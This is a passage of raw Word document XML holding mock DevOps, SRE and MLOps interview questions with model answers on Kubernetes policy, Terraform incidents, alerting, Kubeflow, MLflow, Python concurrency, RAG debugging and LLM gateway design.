        <w:t>A: Network Policies enforce runtime traffic rules: which Pods can talk to which Pods or external destinations. Admission controllers enforce what is allowed to enter the cluster in the first place. Together, they create defense in depth: use Gatekeeper/Kyverno/Pod Security Admission to require labels, deny privileged Pods, require namespace ownership, and require default-deny plus approved allow policies; then use NetworkPolicies to enforce the actual east-west traffic boundaries. Admission prevents unsafe workloads or missing controls from being deployed, while NetworkPolicy limits blast radius if something is deployed or compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Today interview 2026-07-06 - Partial Terraform apply logs: During a production incident caused by a partially successful Terraform apply, what logs would you check first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the CI/CD job logs first to see the exact Terraform command, workspace, variables, plan file, provider versions, and resource address where apply failed. Then check Terraform state and plan output to identify which resources changed successfully and which did not. In parallel, inspect Cloud Audit Logs for IAM, network, database, or compute changes, Kubernetes events if cluster resources were affected, and application/cloud logs for user impact. The goal is to build a timeline: what Terraform attempted, what the cloud accepted, what Kubernetes observed, and when symptoms started.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Today interview 2026-07-06 - Early incident detection: How would you design monitoring to detect customer-impacting incidents early?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from user journeys and define SLIs such as availability, latency, error rate, freshness, and successful transactions. Alert on symptoms users feel: high 5xx rate, p95/p99 latency, failed payments, queue age, failed login, stale dashboards, or error-budget burn. Add service-level dashboards, synthetic checks, black-box probes, and dependency telemetry. Cause-based alerts still help debugging, but paging should be tied to actionable user impact, clear ownership, and runbooks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Today interview 2026-07-06 - Burn-rate alerts: What are burn-rate alerts and why are they useful?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Burn-rate alerts measure how quickly a service is consuming its allowed error budget for an SLO. Instead of alerting on a raw error spike, they ask whether the current error rate will exhaust the budget too quickly. Multi-window multi-burn-rate alerting catches both fast outages, such as a severe 5-minute spike, and slow burns, such as elevated errors over several hours. This reduces noise and aligns alert severity with reliability impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Today interview 2026-07-06 - Log correlation: How do you correlate logs across Kubernetes microservices?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Logging/Tracing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a correlation ID or trace ID generated at the edge and propagate it through every downstream call using headers such as traceparent or x-request-id. Each service writes structured JSON logs containing trace_id, span_id, request_id, service name, version, namespace, pod, user or tenant when safe, and error details. For async systems like Pub/Sub or Kafka, copy the trace context into message attributes. Then the logging backend can filter all logs for one request across services and connect them to distributed traces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Today interview 2026-07-06 - OpenTelemetry basics: Explain OpenTelemetry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OpenTelemetry is an open standard and toolkit for collecting metrics, logs, and traces. It helps instrument applications in a vendor-neutral way.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Opentelemetry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Q14. Today interview 2026-07-06 - Outage decision-making: During an outage with incomplete information, how do you decide whether to roll back, roll forward, use a feature flag, or shift traffic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Optimize for fastest safe mitigation, not proving root cause first. Roll back when the issue clearly started after a release and rollback is low risk. Roll forward when the fix is already known, tested, and safer than reverting, such as a small config patch. Use a feature flag when a specific feature path is causing impact and can be disabled without redeploying. Shift traffic when impact is region, cluster, version, or dependency specific and a healthy target exists. Communicate assumptions, set a timebox, watch customer-impact metrics, and keep a fallback if the chosen mitigation fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Today interview 2026-07-06 - Similar scenario Terraform plan review: What checks would you add before Terraform apply to prevent accidental IAM or networking breakage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Similar Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Require saved plan review in CI, highlighting IAM removals, firewall exposure, subnet/routing changes, deletions, and replacements. Add policy-as-code with OPA/Sentinel to block public ingress, broad admin roles, service account key creation, removal of critical IAM bindings, missing labels, or unapproved production deletes. Use least-privilege Terraform service accounts, separate states, manual approvals for prod, drift detection, and tests for modules. For high-risk resources, add change windows and break-glass rollback steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Today interview 2026-07-06 - Similar scenario progressive mitigation: A bad release affects only 10 percent of users. How would you decide between rollback, canary pause, feature disablement, and traffic shifting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Similar Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First freeze rollout and stop increasing exposure. If the issue maps to a feature flag, disable the feature because that is usually fastest and least disruptive. If the canary version is bad, roll it back or shift traffic back to the stable version. If only one region/cluster is affected, shift traffic to healthy capacity if available. Roll forward only if the fix is small, already tested, and faster than rollback. Validate recovery on user-impact metrics, not only pod health.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 49 - Kubeflow MLflow Multiprocessing RAG Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Kubeflow platform design: How would you design a production Kubeflow platform on GKE for notebooks, pipelines, training, serving, security, and observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Kubeflow Pipelines: How would you design a reusable Kubeflow Pipeline for data validation, training, evaluation, registration, and conditional deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Kubeflow multi-user isolation: How would you isolate teams in Kubeflow using namespaces, profiles, RBAC, service accounts, quotas, and network policies?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Kubeflow troubleshooting: A Kubeflow pipeline step is stuck Pending or failing. How would you debug pods, volumes, service accounts, images, logs, and events?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubeflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. MLflow tracking design: How would you structure MLflow experiments, runs, parameters, metrics, tags, artifacts, and naming conventions for a team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. MLflow model registry: How would you use MLflow Model Registry for versioning, approvals, stage transitions, aliases, rollback, and auditability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. MLflow on Kubernetes: How would you deploy and operate an MLflow tracking server on GKE, including database, object storage, ingress, auth, and monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. MLflow troubleshooting: An MLflow run logged metrics but the model artifact is missing or cannot be loaded. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Mock 49 focus - Python concurrency and multiprocessing choices for cloud and ML workloads: When would you use threads, asyncio, multiprocessing, or a bounded worker pool?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use threads or asyncio for I/O-bound work such as cloud API inventory, object-store reads, HTTP calls, and database queries. Use a bounded worker pool when you need concurrency but must control API quota, memory, or downstream load. Use multiprocessing for CPU-bound work such as feature computation, PDF/image parsing, model preprocessing, compression, encryption, or large local transformations, because separate processes can use multiple CPU cores and avoid the GIL. In production, the decision should come after profiling, and every concurrent design needs timeouts, retries, error collection, and rate limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Mock 49 focus - Python multiprocessing deep dive: Explain multiprocessing in Python and when it is better than multithreading for CPU-heavy ML or data-processing tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multiprocessing creates separate OS processes, so each worker has its own Python interpreter and memory space. That lets CPU-heavy Python code run across multiple cores without being limited by the GIL. It is better than multithreading for CPU-bound work such as feature engineering, image/PDF parsing, CPU-heavy preprocessing, encryption, compression, and batch scoring transformations. Threads are usually better for I/O-bound work because they are lighter and can overlap waiting on network or disk. The tradeoffs of multiprocessing are process startup cost, memory overhead, serialization/pickling of data, and more careful handling of shared state through queues, pools, shared memory, or external storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Mock 49 focus - RAG reliability debugging: A retrieval-augmented generation pipeline returns stale or irrelevant context. How would you debug indexing, embeddings, chunking, retrieval, and reranking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First classify the failure: stale context means the source-to-index pipeline is behind; irrelevant context means retrieval quality is poor. For stale results, check source update time, ingestion jobs, failed upserts/deletes, index aliases, and whether the right collection is queried. For irrelevant results, inspect chunk size, overlap, metadata filters, embedding model/version mismatch, query rewriting, top-k, similarity threshold, and reranker behavior. Validate with a golden retrieval set where each question has expected source documents. Log retrieved IDs, scores, chunk metadata, and prompt template version so every bad answer can be traced to retrieval or generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Vector database operations: How would you operate a production vector database, including indexing strategy, reindexing without downtime, backup/restore, and scaling for query latency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. RAG vs fine-tuning vs prompting: How would you decide between prompt engineering, RAG, and fine-tuning for a domain-specific GenAI use case, and how would that decision change operational ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Resume deep-dive - RAG pipeline: Walk me through the RAG pipeline you built, including embedding model choice, vector database, chunking, and how you measured answer quality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RAG</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Kubeflow vs MLflow vs Vertex AI: How would you choose between Kubeflow, MLflow, and Vertex AI for a GCP MLOps platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Mock 49 focus - RAG and LLM observability: What would you trace and log end to end for a RAG request without leaking prompts, PII, secrets, or retrieved sensitive text?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trace the full request path: gateway, auth, query rewrite, vector search, reranking, prompt assembly, model inference, tool calls, and response post-processing. Log safe metadata such as trace ID, tenant, prompt template version, model version, retrieved document IDs, chunk IDs, similarity scores, token counts, latency by stage, cache hit/miss, finish reason, and safety flags. Do not log raw prompts, secrets, PII, or full retrieved content into standard logs. If deep debugging payloads are required, store redacted or access-controlled samples with short retention and clear audit trails. This gives enough signal for latency, cost, hallucination, and retrieval debugging without creating a data-leak risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 50 - LLM and Machine Learning Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Mock 50 focus - LLM production architecture: How would you design a production LLM-backed service with model routing, caching, rate limits, observability, safety, and cost controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design it as a normal production service plus LLM-specific controls. Put an API gateway in front for auth, quotas, request validation, and tenant identification. Route requests by use case to the right model: cheap/fast model for simple tasks, stronger model for complex tasks, fallback model for provider failures, and self-hosted model where privacy or cost requires it. Add caching for repeated deterministic prompts, token budgets per team, prompt/template versioning, safety filters, and guardrails around tool calls. Observability should capture trace ID, model version, prompt template version, token count, latency by stage, retrieval metadata, error type, and cost without logging sensitive raw prompts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Mock 50 focus - LLM gateway: How would you build an internal gateway that handles auth, per-team token budgets, prompt templates, model fallback, audit logs, and provider abstraction?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a proxy service between applications and model providers. It authenticates callers, maps them to teams/projects, enforces rate limits and token budgets, injects approved prompt templates, and routes to configured models. It should abstract providers such as Vertex AI, OpenAI, Anthropic, or self-hosted vLLM so applications do not hardcode provider logic. Add retries, timeouts, circuit breakers, fallback rules, audit logs, cost attribution, and dashboards. For safety, restrict which teams can use which models, prevent logging secrets, and require approval for high-risk tools or external data sharing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Mock 50 focus - prompt lifecycle: How would you version, test, review, deploy, and roll back prompt changes like application code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Prompt Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store prompts in Git with owners, version numbers, changelogs, and environment-specific configuration. Every prompt change should run against a regression dataset with expected behavior, groundedness checks, safety checks, latency/cost checks, and human review for high-risk flows. Deploy prompts gradually using feature flags or config rollout, track prompt version in every trace/log, and keep old prompt versions available for rollback. The key interview point is that prompt changes can break production like code changes, so they need review, tests, rollout, observability, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Mock 50 focus - LLM evaluation: How would you design automated and human evaluation for answer quality, groundedness, toxicity, latency, and regression testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLM Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use layered evaluation. Automated tests should include fixed golden questions, expected source references, rubric-based LLM-as-judge scoring, toxicity/safety checks, hallucination or groundedness checks, latency, token cost, and exact-match tests where applicable. Human evaluation should review samples for correctness, tone, safety, and business usefulness, especially for ambiguous or regulated use cases. Track scores over time and block deployment when a prompt/model change regresses beyond thresholds. Keep evaluation data versioned so results are comparable across releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
